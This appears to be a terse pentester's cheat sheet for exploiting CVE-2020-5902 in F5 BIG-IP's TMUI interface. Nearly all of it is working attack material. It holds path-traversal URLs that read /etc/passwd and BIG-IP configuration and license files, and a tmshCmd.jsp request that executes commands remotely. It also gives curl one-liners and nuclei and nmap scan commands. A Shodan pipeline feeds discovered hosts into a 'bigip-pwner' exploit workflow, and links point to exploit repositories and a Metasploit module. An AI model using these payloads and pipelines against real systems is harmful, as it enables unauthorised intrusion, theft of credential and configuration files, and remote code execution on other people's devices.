##ย LFI
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsphttps://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffahttps://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf##ย RCE
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoamicurl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nsenmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
https://github.com/dunderhay/CVE-2020-5902
https://github.com/aqhmal/CVE-2020-5902-Scanner
https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77
shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yamlrapid7/metasploit-framework#13807
modules/exploits/linux/http/f5_bigip_tmui_rce.rb
https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4